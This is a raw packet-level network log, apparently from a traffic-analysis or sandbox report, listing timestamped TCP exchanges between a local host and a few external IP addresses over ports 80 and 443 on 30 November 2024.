Nov 30, 2024 04:06:36.920373917 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.920418024 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.921330929 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.921375036 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.921403885 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.921551943 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.922380924 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.922425985 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.922472954 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.922518015 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.923392057 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.923435926 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.923489094 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.923531055 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.924418926 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.924460888 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.924531937 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.924573898 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.925472975 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.925513983 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.925578117 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.925621986 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.926500082 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.926542997 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.926584005 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.926630974 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.927493095 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.927535057 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.927599907 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.927642107 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.928524971 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.928571939 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.928643942 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.928684950 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.929554939 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.929598093 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.929667950 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.929708958 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.930614948 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.930675030 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.930718899 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.930761099 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.931623936 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.931665897 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.931739092 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.931780100 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.932636976 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.932678938 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.932750940 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.932792902 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.933706045 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.933748007 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.933801889 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.933847904 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.934722900 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.934766054 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.934833050 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.934879065 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.935760975 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.935806036 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.935846090 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.935889006 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.936779022 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.936825037 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.936880112 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.936917067 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.937814951 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.937855005 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.937915087 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.937958002 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.938833952 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.939028978 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.939069033 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.939892054 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.939939976 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.939996004 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.940038919 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.940911055 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.940954924 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.941010952 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.941052914 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.941956043 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.942001104 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.942054033 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.942094088 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.942966938 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.943010092 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.943083048 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.943129063 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.944014072 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.944053888 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.944117069 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.944159031 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.945040941 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.945085049 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.945118904 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.945162058 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.946062088 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.946105957 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.946161032 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.946202993 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.947072983 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.947118998 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.947180033 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.947225094 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.948120117 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.948165894 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.948229074 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.948271036 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.949146032 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.949191093 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.949248075 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.949290037 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.950221062 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.950264931 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.950341940 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.950385094 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.951211929 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.951256990 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.951320887 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.951364994 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.952251911 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.952354908 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.952404022 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.953264952 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.953368902 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.953428030 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.954307079 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.954363108 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.954488993 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.954617977 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.955347061 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.955410957 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.955437899 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.956352949 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.956412077 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.956460953 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.957345963 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.957400084 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:37.710525036 CET	443	49828	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:37.710613012 CET	49828	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:37.776179075 CET	49828	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:37.776196003 CET	443	49828	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:37.776451111 CET	443	49828	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:37.778177023 CET	49828	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:37.778476000 CET	49828	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:37.778481007 CET	443	49828	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:38.572166920 CET	443	49828	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:38.572283030 CET	443	49828	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:38.572329044 CET	49828	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:38.572428942 CET	49828	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:38.572438955 CET	443	49828	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:39.038081884 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:39.038115978 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:39.038234949 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:39.038446903 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:39.038458109 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:39.282609940 CET	49818	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:39.282731056 CET	49839	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:39.402580023 CET	80	49839	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:39.402801991 CET	80	49818	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:39.402900934 CET	49818	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:39.402904987 CET	49839	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:39.402904987 CET	49839	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:39.522833109 CET	80	49839	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:40.313447952 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.313540936 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.328985929 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.329001904 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.329224110 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.343450069 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.347502947 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.347532988 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.347626925 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.347655058 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.347759008 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.347796917 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.347914934 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.347943068 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.348079920 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.348108053 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.348256111 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.348282099 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.348293066 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.348308086 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.348438978 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.348464012 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.348485947 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.348609924 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.348639011 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.395329952 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.395636082 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.395662069 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.395678043 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.395694971 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.395720005 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.395731926 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.395766973 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:40.395780087 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:40.788069963 CET	80	49839	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:40.788126945 CET	49839	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:40.795095921 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:40.795707941 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:40.915364981 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:40.915424109 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:40.915600061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:40.915735960 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:40.915993929 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:41.035798073 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.311624050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.311678886 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.311733007 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.311949015 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.312030077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.312051058 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.312056065 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.312072039 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.312096119 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.312231064 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.312272072 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.312284946 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.312304974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.312331915 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.312331915 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.312903881 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.312973022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.313010931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.432287931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.432370901 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.432391882 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.432427883 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.436383009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.436429977 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.436522961 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.436573982 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.445135117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.445179939 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.445266962 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.445306063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.513319969 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.513390064 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.513426065 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.513508081 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.517502069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.517555952 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.517579079 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.517611980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.525938034 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.526010036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.526055098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.526094913 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.534331083 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.534377098 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.534436941 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.534486055 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.542737961 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.542784929 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.542824030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.542912006 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.551104069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.551184893 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.551218033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.552211046 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.559499025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.559545040 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.559617996 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.559672117 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.567888021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.567933083 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.568047047 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.568115950 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.576335907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.576401949 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.576433897 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.576471090 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.583600998 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.583647966 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.583720922 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.583769083 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.590805054 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.590846062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.685946941 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.686000109 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.686006069 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.686214924 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.689507008 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.689553976 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.721756935 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.721860886 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.721863031 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.721898079 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.724001884 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.724056959 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.724109888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.724157095 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.728518009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.728619099 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.728634119 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.728717089 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.733056068 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.733099937 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.733144045 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.733192921 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.737593889 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.737636089 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.737731934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.737782001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.742147923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.742189884 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.742250919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.742300987 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.746687889 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.746788025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.746833086 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.751214027 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.751396894 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.751528025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.751578093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.755774975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.755880117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.755899906 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.755927086 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.760302067 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.760351896 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.760411978 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.760457039 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.764846087 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.764904976 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.764945030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.764986038 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.769429922 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.769480944 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.769587994 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.769627094 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.773977995 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.774027109 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.774085045 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.774127007 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:42.778486967 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:42.778532982 CET	49840	80	192.168.2.4	185.215.113.16
